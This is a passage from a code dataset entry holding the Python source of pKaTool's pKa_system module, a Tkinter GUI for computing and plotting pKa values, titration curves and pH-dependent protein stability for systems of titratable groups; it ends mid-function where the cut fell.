repo_name
stringlengths
5
92
path
stringlengths
4
232
copies
stringclasses
19 values
size
stringlengths
4
7
content
stringlengths
721
1.04M
license
stringclasses
15 values
hash
int64
-9,223,277,421,539,062,000
9,223,102,107B
line_mean
float64
6.51
99.9
line_max
int64
15
997
alpha_frac
float64
0.25
0.97
autogenerated
bool
1 class
dmnfarrell/peat
pKaTool/pKa_system.py
1
55804
#!/usr/bin/env python # -*- coding: iso-8859-15 -*- # # pKaTool - analysis of systems of titratable groups # Copyright (C) 2010 Jens Erik Nielsen # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # Contact information: # Email: Jens.Nielsen_at_gmail.com # Normal mail: # Jens Nielsen # SBBS, Conway Institute # University College Dublin # Dublin 4, Ireland import sys from Tkinter import * import tkFileDialog import pKa_base, pKa_system_help, pKa_calc, pKa_system_micro, pKa_system_file_menu, CCPS_stab_opt import pKa_system_data_manipulation import group_control import ftir_data __pKaSystemVersion__=1.2 # # Geometry helper functions # def get_y_fromstab(val,span): """Get the y coordinate for plotting the stability curve""" zero=10 graphrange=180 if span==0: span=10 return (graphrange-val*(graphrange/span))+zero # # -------- # class pKa_system(Frame,pKa_base.pKa_base,pKa_system_help.system_help, pKa_system_help.pKsensitivity, pKa_system_help.decompose, pKa_system_micro.Micro_states, pKa_system_file_menu.file_menu, pKa_system_file_menu.fit_menu, pKa_system_data_manipulation.data_manipulation, CCPS_stab_opt.Optimisation_Analysis): def __init__(self,numgroups=None,parent_application=None,data=None,protein=None,field_name=None,update=True): # # Set up the main window # # The main window provides choice between the different modes # for now: pKa Calculations, pKa System # self.ID='pKa_system' self.font="Times 12 bold" self.fg_colour='white' self.bg_colour='black' self.colour_order=['#646464','#4444ff','red','green','magenta','yellow','orange','grey','magenta'] self.linewidth=2 self.names={} self.lastdir=None self.parent_application=parent_application self.init_not_done=1 self.ID='pKa_system' self.protein=protein self.field_name=field_name # # Stability window parameters # self.stab_window=None self.U_control=None self.old_stab_status='' self.exp_stab_curve=False # # Set the pKa calculation parameters # self.pHstart=0.00001 self.pHend=20.0 self.maxcrg=1.0 self.mincrg=-1.0 # # pKa method # self.pkamethods={'Boltzmann':pKa_calc.Boltzmann, 'Monte Carlo':pKa_calc.Monte_Carlo, 'Tanford-Roxby':pKa_calc.Tanford_Roxby, 'Monte Carlo (C++)':pKa_calc.Monte_Carlo_CPP, 'Boltzmann (C++)':pKa_calc.Boltzmann_CPP} # # Check if we are called from EnzSim # self.enzsim=False if protein=='__enzsim_application__': self.enzsim=True # # Set data # self.data={'numgroups':numgroups} # # All lines drawn # self.lines={} self.state_lines={} self.stab_lines={} self.to_clear=[] self.stab_test_on=None # # Do the window # self.do_window() if update: self.update_pkasystem_curves() self.window.update_idletasks() # # convert data # if data: if data.has_key('groups'): self.unpack_all_data(data) else: self.convert_titration_data(data) return # # ------ # def do_window(self): # # Main window # if not self.parent_application: Frame.__init__(self) self.window=self.master else: self.window=Toplevel() # # Title # #self.window.geometry('+280+380') self.window.title("pKa System - Play with titratable groups") # # Get the size of the screen # # # Text box til top # label1=Label(self.window, text="Enter number of titratable groups",font=self.font) label1.grid(row=0,column=0, sticky=W) # # Entry field # self.number_of_groups=IntVar() self.numgrps_widget=Entry(self.window,textvariable=self.number_of_groups) # # If we have a number then insert it # if self.data['numgroups']: self.number_of_groups.set(self.data['numgroups']) self.numgrps=self.data['numgroups'] self.window.destroy() else: def destroy(event=None): self.numgrps=int(self.number_of_groups.get()) self.window.destroy() return self.number_of_groups.set(3) self.numgrps_widget.grid(row=0,column=1,sticky=W) self.numgrps_widget.bind('<Return>',destroy) self.window.wait_window(self.window) # # Done # self.getgrps() return # # -------------- # def getgrps(self,event=None): # # Get the number of groups # import string # # Open the window for the titration curves # if not self.parent_application: Frame.__init__(self) self.window=self.master screen_width=self.winfo_screenwidth() screen_height=self.winfo_screenheight() else: self.window=Toplevel() screen_width=self.parent_application.winfo_screenwidth() screen_height=self.parent_application.winfo_screenheight() # self.titwin=self.window self.titwin.title('Titration curves [native]') #self.titwin.geometry('+20+%d' %(95+self.numgrps*43)) # # Draw the window with the titration curves # self.titwidth=1200 self.titheight=450 self.tc=Canvas(self.titwin,bd=5,bg='white',width=self.titwidth, height=self.titheight, scrollregion=(0,0,self.titwidth,self.titheight)) self.tc.xview("moveto", 0) self.tc.yview("moveto", 0) self.tc.grid(row=0,column=0) # # Axes # self.draw_ordinates(self.tc) # # Open window with the controls # self.startrow=3 self.groups={} self.win=Toplevel() # # Create the main pulldown menu # self.menu=Menu(self.win) # # File menu # self.file_menu=Menu(self.menu,tearoff=0) self.file_menu.add_command(label='Load system',command=self.load_system) self.file_menu.add_command(label='Save system',command=self.save_system) if self.parent_application: if getattr(self.parent_application,'ID',None): if self.parent_application.ID=='EAT': self.file_menu.add_command(label='Save system in EAT & Exit',command=self.send_system_to_EAT) elif self.parent_application.ID=='Ekin': self.file_menu.add_command(label='Save system in EAT',command=self.send_system_to_EAT) self.file_menu.add_command(label='Load titration curves',command=self.load_curves) self.file_menu.add_command(label='Save titration curves',command=self.save_curves) self.file_menu.add_command(label='Load titration_DB data',command=self.load_titdb) self.file_menu.add_command(label='Load pH activity profile',command=self.load_pH_activity_profile) self.file_menu.add_command(label='Load pH stability profile',command=self.load_pH_stability_profile) self.file_menu.add_command(label='Load FTIR data',command=self.load_FTIR_data) self.file_menu.add_command(label='Print population table',command=self.print_table) self.file_menu.add_command(label='Add group',command=self.add_group) self.file_menu.add_command(label='Remove exp. titration curve',command=self.remove_exp_curve) self.file_menu.add_command(label='Exit',command=self.quit_application) self.menu.add_cascade(label='File',menu=self.file_menu) # # Command menu # self.command_menu=Menu(self.menu,tearoff=0) self.command_menu.add_command(label='Decompose system',command=self.decompose_system) self.command_menu.add_command(label='Sensitivity analysis',command=self.sensitivity_test) self.command_menu.add_command(label='Change dielectric constant',command=self.change_dielectric) self.command_menu.add_command(label='Activate updating',command=self.activate_callbacks) self.command_menu.add_command(label='Deactivate updating',command=self.deactivate_callbacks) self.command_menu.add_separator() self.command_menu.add_command(label='Copy group to EAT_DB Ekin',command=self.copy_to_Ekin) self.menu.add_cascade(label='Command',menu=self.command_menu) # # Fitting menu # self.fit_menu=Menu(self.menu,tearoff=0) self.fit_menu.add_command(label='Fit system to loaded curves',command=self.fit_system_to_curves) self.fit_menu.add_command(label='Fit to pH-activity profile',command=self.fit_to_ph_activity_profile) self.fit_menu.add_command(label='Fit to loaded curves and pH-activity profile',command=self.fit_to_curves_and_ph_activity_profile) self.fit_menu.add_command(label='Estimate experimental uncertainty',command=self.estimate_experimental_uncertainty) self.fit_menu.add_separator() self.fit_menu.add_command(label='Fit to FTIR data',command=self.fit_ftir) self.fit_menu.add_command(label='Fit to FTIR data and pH-activity profile',command=self.fit_to_ftir_and_ph_activity_profile) self.fit_menu.add_separator() self.fit_menu.add_command(label='Combinatorial scan',command=self.combinatorial_scan) self.fit_menu.add_command(label='Show close parameter sets',command=self.show_close) self.fit_menu.add_command(label='Test uniqueness',command=self.test_uniqueness) self.fit_menu.add_command(label='Uniqueness scan',command=self.uniqueness_scan) self.fit_menu.add_separator() self.fit_menu.add_command(label='Evaluate fit',command=self.evaluate_fit) self.geom_var=StringVar() self.fit_menu.add_command(label="Do geometry optimisation",command=self.start_geom) self.fit_menu.add_command(label='Identify number of groups in system',command=self.identify_no_groups) self.menu.add_cascade(label='NMR',menu=self.fit_menu) # # System analysis and optimisation # self.optana_menu=Menu(self.menu,tearoff=0) self.optana_menu.add_command(label='CCPS population/Stability',command=self.stab_and_CCPS_pop) self.menu.add_cascade(label='Optimise and Analyse',menu=self.optana_menu) # # View menu # self.view_menu=Menu(self.menu,tearoff=0) # Show microscopic states self.micro_var=IntVar() self.micro_var.set(0) self.view_menu.add_checkbutton(label='Microscopic titration', command=self.update_pkasystem_curves, variable=self.micro_var,onvalue=1,offvalue=0) # Show loaded titration curves self.display_loaded_curves=IntVar() self.display_loaded_curves.set(0) self.view_menu.add_checkbutton(label='Loaded titration curves', command=self.update_pkasystem_curves, variable=self.display_loaded_curves,onvalue=1,offvalue=0) # Show ftir window self.show_ftir=IntVar() self.show_ftir.set(0) self.view_menu.add_checkbutton(label='Show FTIR window', command=self.update_pkasystem_curves, variable=self.show_ftir,onvalue=1,offvalue=0) # # Window for manipulating kcat of microstates # self.kcat_window_visible=IntVar() self.kcat_window_visible.set(0) self.view_menu.add_checkbutton(label='kcat of microstates', command=self.toggle_kcat_window,variable=self.kcat_window_visible,onvalue=1,offvalue=0) self.menu.add_cascade(label='View',menu=self.view_menu) # # Help menu # self.help_menu=Menu(self.menu,tearoff=0) self.help_menu.add_command(label='About pKaSystem',command=self.about) self.menu.add_cascade(label='Help',menu=self.help_menu) # # Configure the menu # self.win.config(menu=self.menu) # self.win.title('Group controls') # # Place window close to center # self.win.geometry('+%d+%d' %(screen_width/2-min(600,screen_width/4),screen_height/2-min(500,screen_height/3))) # # Buttons for each group # int_ene=1 for id_num in range(self.numgrps): #colour=self.colour_order[id_num%len(self.colour_order)] int_ene=1 self.groups[id_num]=group_control.group_control(self, self.startrow+id_num, id_num, self.numgrps, int_ene, self.colour_order) # # Button for controlling stability window # self.stability_var=StringVar() self.stability_var.set('off') self.stab_button=Checkbutton(self.win,text='Stability curve: ', variable=self.stability_var,onvalue='on', offvalue='off', command=self.stability_on_off) self.stab_button.deselect() self.stab_button.grid(row=0,column=0,columnspan=2) # # Exit button # if self.enzsim: self.exit_bt=Button(self.win,text='Data->EnzSim',command=self.quit_application) else: self.exit_bt=Button(self.win,text='Quit',command=self.quit_application) self.exit_bt.grid(row=0,column=2,sticky='wens') # # Snapshot button # self.snapshot_btn=Button(self.win,text='Snapshot',command=self.snapshot) self.snapshot_btn.grid(row=0,column=3,sticky='wens') # # Window capture button # self.print_btn=Button(self.win,text='Print2File',command=self.print2file) self.print_btn.grid(row=0,column=4,sticky='wens') # # Clear button # self.clr_btn=Button(self.win,text='Clear all',command=self.clear) self.clr_btn.grid(row=0,column=5,sticky='wens') # # pHstep slider # self.pHstep=DoubleVar() self.pHstep_sl=Scale(self.win,from_=0.01,to=2.0,resolution=0.01, orient='horizontal',relief='ridge', command=self.update_pkasystem_curves,variable=self.pHstep, label='pHstep') self.pHstep_sl.grid(row=0,column=6,sticky='wens') self.pHstep.set(0.5) # # pKa calculation method selector # self.pkamethod_sel=StringVar() self.pkamethod_sel.set('Boltzmann') self.pkamethod_button=Menubutton(self.win,textvariable=self.pkamethod_sel,relief=RAISED) self.pkamethod_menu=Menu(self.pkamethod_button,tearoff=0) self.pkamethod_button['menu']=self.pkamethod_menu # # Methods # for method in self.pkamethods.keys(): self.pkamethod_menu.add_radiobutton(label=method, variable=self.pkamethod_sel, value=method, indicatoron=1, command=self.update_pkasystem_curves) self.pkamethod_button.grid(row=0,column=7,sticky='news') # # Monte Carlo steps # self.MCsteps=IntVar() self.mcsteps_scale=Scale(self.win,from_=0,to=2500,resolution=100, orient='horizontal',relief='ridge', command=self.update_pkasystem_curves, variable=self.MCsteps, state=DISABLED, label='Monte Carlo steps') self.MCsteps.set(self.numgrps*100) self.mcsteps_scale.grid(row=0,column=8,sticky='news') # # Button for updating the titration curves # stab_test=Button(self.win,text='Update curves',command=self.update_pkasystem_curves) stab_test.grid(row=0,column=9,sticky='wens') # # Reposition the window with the titration curves according to the # size of the control window # width,height,xorg,yorg=self.get_geometry(self.win) self.titwin.geometry('+%d+%d' %(xorg-5,yorg+height+5)) # # Draw the first curves # self.titwin.update() self.win.update() self.init_not_done=None self.titwin.update() self.win.update() self.activate_callbacks() #if self.master.update: # self.update_pkasystem_curves() # # Done # return # # ----- # def about(self): """Print the About section""" import tkMessageBox tkMessageBox.showinfo("pKaTool / pKaSystem", 'pKaTool version %s\nAuthors: Jens Erik Nielsen & Chresten S¯ndergaard\n\nCopyright (c) Jens Erik Nielsen\nUniversity College Dublin 2003-2007\nAll rigths reserved\nhttp://enzyme.ucd.ie/Science/pKa\n\nPlease remember to cite:\nAnalysing the pH-dependent properties of proteins using pKa calculations\nNielsen JE\nJ Mol Graph Model 2007 Jan;25(5):691-9\n\nIf using the NMR fitting routines please cite:\n\nDetermination of electrostatic interaction energies and protonation state populations in enzyme active sites\nS¯ndergaard CR, McIntosh LP, Pollastri G, Nielsen JE\nJ. Mol. Biol. (in press).' %__pKaSystemVersion__,parent=self.master) return # # -------------------- # def get_geometry(self,widget): """Get the geometry of a widget Return width,height,xorg,yorg""" widget.update_idletasks() txt=widget.winfo_geometry() width=int(txt.split('x')[0]) rest=txt.split('x')[1] height=int(rest.split('+')[0]) xorg=int(rest.split('+')[1]) yorg=int(rest.split('+')[2]) return width,height,xorg,yorg # # ------- # def quit_application(self): """Quit application""" self.win.destroy() self.titwin.destroy() return # # -------------------- # def snapshot(self): # # Preserve the current lines (for making figures) # x=0 for line in self.lines.keys(): x=x+1 if x==1: self.tc.delete(line) else: self.to_clear.append(line) del self.lines[line] if x==2: x=0 return # # -------------------- # def print2file(self): # # Print Canvas to file # import sys, os if not self.lastdir: self.lastdir=os.getcwd() filename=tkFileDialog.asksaveasfilename(defaultextension='.ps', initialdir=self.lastdir, filetypes=[("Postscript files","*.ps"),("All files","*.*")]) if filename: self.write_psfile(filename) else: return return # # -------------------- # def write_psfile(self,filename): """ # Dump the Canvas to a postscript file """ import os self.lastdir=os.path.split(filename)[0] if filename[-3:]!='.ps': filename=filename+'.ps' self.tc.postscript(colormode='color',file=filename) return # # -------------------- # def clear(self,junk=None): # # Clear all lines # for line in self.to_clear: self.tc.delete(line) return # # -------------------- # def stability_on_off(self): """Open a window for drawing the stability curve""" # # Should we open the stability window? # new=self.stability_var.get() if new=='on' and self.old_stab_status!='on': # # Yes, open it # self.stab_test_on=1 self.old_stab_status='on' self.stab_window=Toplevel() # self.stabwidth=1000 self.stabheight=300 self.stab_window.geometry('%dx%d+10+20' %(self.stabwidth,self.stabheight)) self.stab_window.title('pH dependence of protein stability') self.stab_tc=Canvas(self.stab_window,bd=5,bg='white',width=self.titwidth,height=self.titheight,scrollregion=(0,0,self.titwidth,self.titheight)) self.stab_tc.xview("moveto", 0) self.stab_tc.yview("moveto", 0) self.stab_tc.grid(row=1,column=0) # # Plotting button # def print_curve(event=None): Button(self.stab_window,command=print_curve).grid(row=0,column=0) # pH axis self.stab_startx=80 self.stab_endx=910 self.stab_starty=160 self.stab_endy=10 self.pH_axis(self.stab_tc,self.stab_startx,self.stab_starty, self.stab_endx,self.stab_endy) # # Controls for unfolded pKa values # self.U_control=Toplevel() self.U_control.title('Controls for Unfolded form') self.U_control.geometry('+10+10') self.unfolded_groups={} for id_num in range(self.numgrps): int_ene=1 #colour=self.colour_order[id_num%len(self.colour_order)] self.unfolded_groups[id_num]=group_control.group_control(self, self.startrow+id_num,id_num, self.numgrps,int_ene,self.colour_order,window=self.U_control) # # If we are displaying real groups then set the intrinsic pKa to the model pKa value # if self.parent_application: intpKa_folded=self.groups[id_num].modelpK else: intpKa_folded=self.groups[id_num].intpka.get() # self.unfolded_groups[id_num].intpka.set(intpKa_folded) # # # row=self.startrow+self.numgrps+1 self.show_grp_contribs=IntVar() self.show_grp_contribs.set(0) grp_contribs=Checkbutton(self.U_control,text='Show residue contributions', onvalue=1,offvalue=0,variable=self.show_grp_contribs,command=self.update_pkasystem_curves) grp_contribs.grid(row=row,column=0) # # Which contribution should we draw # self.contrib_type=IntVar() self.contrib_type.set(1) Radiobutton(self.U_control,text='contributions from pKa shifts',variable=self.contrib_type,value=1,command=self.update_pkasystem_curves).grid(row=row,column=1) #Radiobutton(self.U_control,text='charge-charge contributions',variable=self.contrib_type,value=2,command=self.update_curves).grid(row=row,column=2) # # Should we show min and max stabilisation? # self.show_min_max_stab=IntVar() self.show_min_max_stab.set(1) Checkbutton(self.U_control,text='Show min and max stabilisation', onvalue=1, offvalue=0, variable=self.show_min_max_stab, command=self.update_pkasystem_curves).grid(row=row,column=3) # # Update curves # self.window.update() self.U_control.update() self.stab_test_on=None self.update_pkasystem_curves() # # Move the windows to sensible positions # width,height,xorg,yorg=self.get_geometry(self.win) self.U_control.geometry('+%d+%d' %(xorg,yorg+height)) # width,height,xorg,yorg=self.get_geometry(self.U_control) self.stab_window.geometry('+%d+%d' %(xorg,yorg+height)) # # Activate the callbacks for the unfolded groups # self.activate_callbacks() else: self.old_stab_status='off' self.stab_window.destroy() self.U_control.destroy() return # # -------------------- # def dummy(self,event=None): """Dummy callback function""" return # # ---- # def setup_system(self,group_array,X,energies=None): """Set up the system of titratable groups from the info in group_array""" import string # # Create the description of the system # self.names={} self.ids={} for group in group_array.keys(): name=':'+string.zfill(group,4)+':' if group_array[group].acid_base.get()==1: name=name+'ASP' else: name=name+'ARG' self.names[group]=name self.ids[name]=group # # Update experimtal data dictionary to new names... # if getattr(self,'titration_data',None): for old_key in self.titration_data.keys(): for new_key in self.names: if int(old_key[1:5]) == int(self.names[new_key][1:5]): nk = old_key[0:6]+self.names[new_key][6:] self.titration_data[self.names[new_key]]=self.titration_data[old_key] if not old_key == self.names[new_key]: del self.titration_data[old_key] # # Add all data # matrix={} X.intene={} X.intrinsic_pKa={} for group in group_array.keys(): # # Set everything # name1=self.names[group] # Int pKa intpka=group_array[group].intpka.get() X.intrinsic_pKa[name1]=intpka type=group_array[group].acid_base.get() # # Set the interaction energies # if not X.intene.has_key(group): X.intene[name1]={} matrix[name1]={} for group2 in group_array[group].intenes.keys(): type2=group_array[group2].acid_base.get() name2=self.names[group2] if group_array[group].active.get()==1 and group_array[group2].active.get()==1: if type==type2: X.intene[name1][name2]=group_array[group].intenes[group2].get() else: X.intene[name1][name2]=-group_array[group].intenes[group2].get() if name1!=name2: matrix[name1][name2]=self.E2dist(X.intene[name1][name2],energies) else: X.intene[name1][name2]=0.0 # # We only have part of the interaction energies in each group # This is because the interaction energy is stored as a single # Tk variable # for group2 in group_array.keys(): name2=self.names[group2] type2=group_array[group2].acid_base.get() if group2!=group: if group_array[group2].intenes.has_key(group): # # Is this group active? # if group_array[group].active.get()==1 and group_array[group2].active.get()==1: if type==type2: X.intene[name1][name2]=group_array[group2].intenes[group].get() else: X.intene[name1][name2]=-group_array[group2].intenes[group].get() # # Matrix of distances # if name1!=name2: matrix[name1][name2]=self.E2dist(X.intene[name1][name2],energies) else: X.intene[name1][name2]=0.0 # else: X.intene[name1][name2]=0.0 # Default distance for zero interaction energy if name1!=name2: matrix[name1][name2]=self.E2dist(0.0,energies) # # All Done # return matrix # # ----------------- # def E2dist(self,E,energies=None): """ # convert an electrostatic interaction energy to a distance # Units: E(kT), dist: A If energies==1, then we do not convert the energy""" # # Check if we should return energies # import math if energies: return E # # No, return distances # E=abs(E) # the sign doesn't matter if E>0.001: # # Look in Tynan-Connolly and Nielsen, Protein Science: Re-Designing protein pKa values # for details on the formula below # eps=1.0 # We set eps to 1, and scale distances afterwards distance=243.3*math.log(10.0)/(eps*E) else: distance=1000.0 return distance # # ------------------ # def calc_pKas_from_scales(self,group_array): """Calculate pKa values for the system""" # # Fill instance with data # X=self.pkamethods[self.pkamethod_sel.get()]() MCsteps=0 if self.pkamethod_sel.get()=='Monte Carlo': MCsteps=self.MCsteps.get() self.mcsteps_scale.configure(state=ACTIVE) elif self.pkamethod_sel.get()=='Monte Carlo (C++)': MCsteps=200000 else: self.mcsteps_scale.configure(state=DISABLED) # matrix_dummy=self.setup_system(group_array,X) # # Set the pKa value variables # X.groups=X.intrinsic_pKa.keys() X.groups.sort() # # Make a list of experimental pH values to include in calculation # exp_pHs =[] if getattr(self,'titration_data',None): for group in self.titration_data.keys(): for pH in self.titration_data[group].keys(): if exp_pHs.count(pH) == 0: exp_pHs.append(pH) # # also include pH values from loaded ph-activity profile # if getattr(self,'activity_data',None): for pH in self.activity_data.keys(): if exp_pHs.count(pH) == 0: exp_pHs.append(pH) # # and also from ftir data # if getattr(self, 'FTIR_win',None): for pH in self.FTIR_win.ftir_data.keys(): if exp_pHs.count(pH) ==0: exp_pHs.append(pH) # # Include the effect of non-system groups? # if hasattr(self,'non_system_groups'): if self.non_system_groups: X.non_system_groups={} for group_id in self.non_system_groups.keys(): name=self.names[group_id] X.non_system_groups[name]=self.non_system_groups[group_id].copy() # # Get the pKa values # pKa_values,prot_states=X._calc_pKas(mcsteps=MCsteps, phstep=self.pHstep.get(), phstart=self.pHstart, phend=self.pHend, exp_pHs=exp_pHs, verbose=1) return X,pKa_values,prot_states # # ----------------- # def update_scales(self,junk=None,draw=1,doit=None): """Update the scale widgets when the user moves a dial""" # # Folded (normal) groups # for group in self.groups.keys(): self.groups[group].update_scales() # # Update the unfolded scales if theyr're active # if self.stability_var.get()=='on': for group in self.unfolded_groups.keys(): self.unfolded_groups[group].update_scales() # # Redraw everything # self.update_pkasystem_curves(junk,draw,doit) return # # ----- # def update_scales_from_fit(self,junk=None,draw=1,doit=None): # # update group scales from fitter # for group in self.groups: self.groups[group].update_scales_from_fit() self.update_pkasystem_curves(junk,draw,doit) return # # ----- # def update_pkasystem_curves(self,junk=None,draw=1,doit=None): """Update all curves""" if self.init_not_done: return if self.stab_test_on and doit==None: return # # Redraw the curves # import string, pKarun PKana=pKarun.pKa_general.pKanalyse() # # Calculate pKa values for the folded form # X,pKa_values,prot_states=self.calc_pKas_from_scales(self.groups) self.pKa_calc_instance=X if not draw: return X # # Set the pKa values # for group in pKa_values.keys(): self.groups[self.ids[group]].update_group_control() self.groups[self.ids[group]].pkavalue.set("%4.1f" %pKa_values[group]) # # Set the HH fit # solution,sq=PKana.fit_to_henderson(X.prot_states[group]) try: self.groups[self.ids[group]].HHfit.set('%5.2f (%4.2f / %3.2f)' %(abs(float(solution[1])),abs(float(solution[0])),float(sq))) except: self.groups[self.ids[group]].HHfit.set('HH-fit error') # # Delete all lines from last round # for line in self.lines.keys(): self.tc.delete(line) del self.lines[line] # Draw the titration curves self.titration_curves={} groups=pKa_values.keys() groups.sort() group_count=0 colour_map = {} for group in groups: # # Store everything in self.titration_curves # self.titration_curves[group]=X.prot_states[group].copy() # # Is this group active? # if self.groups[group_count].active.get()==0: group_count=group_count+1 continue # # Yes # style=self.groups[group_count].style.get() lastpH=X.pHvalues[0] lastcrg=X.prot_states[group][lastpH] colour=self.colour_order[group_count%len(self.colour_order)] colour_map[group] = colour # for pH in X.pHvalues[1:]: lastx,lasty=self.get_xy(lastpH,lastcrg) crg=X.prot_states[group][pH] x,y=self.get_xy(pH,crg) if style==1: self.lines[(self.tc.create_line(lastx,lasty,float(x),float(y), fill=colour, width=self.linewidth))]=1 else: self.lines[(self.tc.create_line(lastx,lasty,float(x),float(y), fill=colour, width=self.linewidth, dash=(1,2)))]=1 lastcrg=crg lastpH=pH # # Update the counter for colours # group_count=group_count+1 # # Should we draw the microscopic states? # if self.micro_var.get()==1: self.update_microstates(X) else: self.close_state_win() # # Should we draw the stabilty curves? # stab_status=self.stability_var.get() if stab_status=='on': self.stability=self.do_stab_curve(X) # # Should we display loaded titration curves? # #try: # print 'titration_data', self.titration_data #except: # print 'no titration_data' if self.display_loaded_curves.get()==1: if not getattr(self,'titration_data',None): import tkMessageBox tkMessageBox.showwarning('No titration curves loaded', 'Load titration curves first') self.display_loaded_curves.set(0) else: for group in self.titration_data.keys(): phvals=self.titration_data[group].keys() phvals.sort() for ph in phvals: crg=self.titration_data[group][ph] x,y=self.get_xy(ph,crg) try: f = colour_map[group] except: f = 'yellow' handle=self.tc.create_oval(x-2,y-2,x+2,y+2,fill=f) self.lines[handle]=1 # # Is there an FTIR model to update? # if self.show_ftir.get() == 1: if getattr(self, 'FTIR_win',None): self.FTIR_win.draw_fit() else: self.FTIR_win = ftir_data.FTIR_data(self) self.FTIR_win.draw_fit() # # Other callbacks? # self.check_other_callbacks() return X # # ------- # def check_other_callbacks(self): """self.callbacks holds a list of funcions that should be called""" if not hasattr(self,'callbacks'): self.callbacks=[] for callback in self.callbacks: callback() return def add_callback(self,function): """Add a callback function""" self.check_other_callbacks() add=1 for callback in self.callbacks: if function==callback: add=None break if add: self.callbacks.append(function) self.check_other_callbacks() return # # ------------- # def do_stab_curve(self,X): """ Calculate the stability curve""" # # Make sure that the acid/base info for the unfolded form is the same # as for the folded form # for group in self.unfolded_groups.keys(): acid_base=self.groups[group].acid_base.get() self.unfolded_groups[group].acid_base.set(acid_base) # # Calculate pKa values for the unfolded form # UF,ufpKa_values,UF_prot_states=self.calc_pKas_from_scales(self.unfolded_groups) for group in ufpKa_values.keys(): self.unfolded_groups[self.ids[group]].pkavalue.set("%4.1f" %ufpKa_values[group]) # # Get all the interaction energies # ufmatrix=self.setup_system(group_array=self.unfolded_groups,X=UF,energies=1) matrix=self.setup_system(group_array=self.groups,X=X,energies=1) # # Integrate # integral=0.0 intcurve=[] intcurve2=[] dpH=abs(X.pHvalues[0]-X.pHvalues[1]) min_val=99999 max_val=-9999 # # Specify constants # k=1.3806503E-23 T=298.15 Na=6.02214199E23 #factor=k*T*Na/1000.0 # No don't do it factor=1 import math ln10=math.log(10) # # Loop over all pH values # stability={} for pH in X.pHvalues: intcurve.append(integral) stability[pH]=integral #Dictionary that will be passed back # # Update min and max # if integral<min_val: min_val=integral if integral>max_val: max_val=integral # # Calculate total stability # for group in ufpKa_values.keys(): integral=integral+ln10*dpH*(X.prot_states[group][pH]-UF.prot_states[group][pH])*factor # # Calculate the electrostatic interaction # integral2=0 for group in matrix.keys(): for group2 in matrix.keys(): # # Get the interaction between this group and the other group # g1_id=self.ids[group] g2_id=self.ids[group2] if self.groups[g1_id].active.get()==1 and self.groups[g2_id].active.get()==1 and group!=group2: integral2=integral2+abs(X.prot_states[group][pH])*abs(X.prot_states[group2][pH])*matrix[group][group2]/2.0*factor # Subtract the interaction in the unfolded state integral2=integral2-abs(UF.prot_states[group][pH])*abs(UF.prot_states[group2][pH])*ufmatrix[group][group2]/2.0*factor # # Update min and max # if integral2<min_val: min_val=integral2 if integral2>max_val: max_val=integral2 intcurve2.append(integral2) max_stabilisation=max_val min_stabilisation=min_val # # Plot the whole thing # lastpH=X.pHvalues[0] lastval=intcurve[0] count=1 span=max_val-min_val # # Delete the lines from last time # for line in self.stab_lines.keys(): self.stab_tc.delete(line) del self.stab_lines[line] # # Draw the y axis # canvas=self.stab_tc x_axis=self.get_x(X.pHvalues[0])-20 y_axis=get_y_fromstab(min_val,span) endy=get_y_fromstab(max_val,span) self.stab_lines[canvas.create_line(x_axis,max([160,y_axis]), x_axis,endy-10,fill='black', width=self.linewidth)]=1 self.stab_lines[canvas.create_text(x_axis+10,endy-35,text='delta G of folding (kT)',fill='black',anchor='w')]=1 # # Tick marks and tick labels # for tickval in range(int(min_val*100),int(max_val*100),int(max([(span*100.0)/5.0,1.0]))): y=get_y_fromstab(tickval/100.0,span) self.stab_lines[canvas.create_line(x_axis, y,x_axis-5,y, fill='black',width=self.linewidth)]=1 self.stab_lines[canvas.create_text(x_axis-25,y,text='%5.2f' %( float(tickval)/100.0),fill='black')]=1 # # Draw the stability lines # count=1 summed_contributions={} label_position={} for pH in X.pHvalues[1:]: lastx=self.get_x(lastpH) lasty=get_y_fromstab(lastval,span) val=intcurve[count] x=self.get_x(pH) y=get_y_fromstab(val,span) self.stab_lines[self.stab_tc.create_line(lastx,lasty,float(x),float(y), fill='black', width=self.linewidth)]=1 # # Outline the contribution of each group # if self.show_grp_contribs.get()==1: colour_count=0 null_y=get_y_fromstab(0.0,span) starty_positive=null_y starty_negative=null_y ufgroups=ufpKa_values.keys() ufgroups.sort() for group in ufgroups: # # Is this group active? # g1_id=self.ids[group] if self.groups[g1_id].active.get()==1: # # Make sure the dictionary is initialised # if not summed_contributions.has_key(group): summed_contributions[group]=0.0 label_position[group]=None # # Get this contribution # dx=abs(lastx-x) if self.contrib_type.get()==1: # # Here we get the stability contribution from pKa shifts # endy=get_y_fromstab(dpH*ln10*(X.prot_states[group][pH]-UF.prot_states[group][pH])*factor,span)-null_y summed_contributions[group]=summed_contributions[group]+endy else: # # Otherwise the stability contribution from charge-charge interactions # stab=0.0 for group2 in matrix.keys(): # # Get the interaction between this group and the other group # g2_id=self.ids[group2] if self.groups[g1_id].active.get()==1 and self.groups[g2_id].active.get()==1 and group!=group2: stab=stab+abs(X.prot_states[group][pH])*abs(X.prot_states[group2][pH])*matrix[group][group2]/2.0*factor # Subtract the interaction in the unfolded state stab=stab-abs(UF.prot_states[group][pH])*abs(UF.prot_states[group2][pH])*ufmatrix[group][group2]/2.0*factor endy=get_y_fromstab(stab,span)-null_y summed_contributions[group]=endy # # Draw the box # endy=summed_contributions[group] if endy>0: self.stab_lines[self.stab_tc.create_rectangle(x+1.5*dx,starty_positive,lastx+1.5*dx,endy+starty_positive, fill=self.colour_order[colour_count], outline=self.colour_order[colour_count], stipple='gray50', width=self.linewidth)]=1 label_position[group]=(starty_positive*2+endy)/2.0 starty_positive=endy+starty_positive else: self.stab_lines[self.stab_tc.create_rectangle(x+1.5*dx,starty_negative,lastx+1.5*dx,endy+starty_negative, fill=self.colour_order[colour_count], outline=self.colour_order[colour_count], stipple='gray50', width=self.linewidth)]=1 label_position[group]=(starty_negative*2+endy)/2.0 starty_negative=endy+starty_negative colour_count=colour_count+1 if colour_count==len(self.colour_order): colour_count=0 # # Continue # lastval=val lastpH=pH count=count+1 # # Put labels on the contributions # if self.show_grp_contribs.get()==1: colour_count=0 for group in ufgroups: # # Is this group active? # g1_id=self.ids[group] if 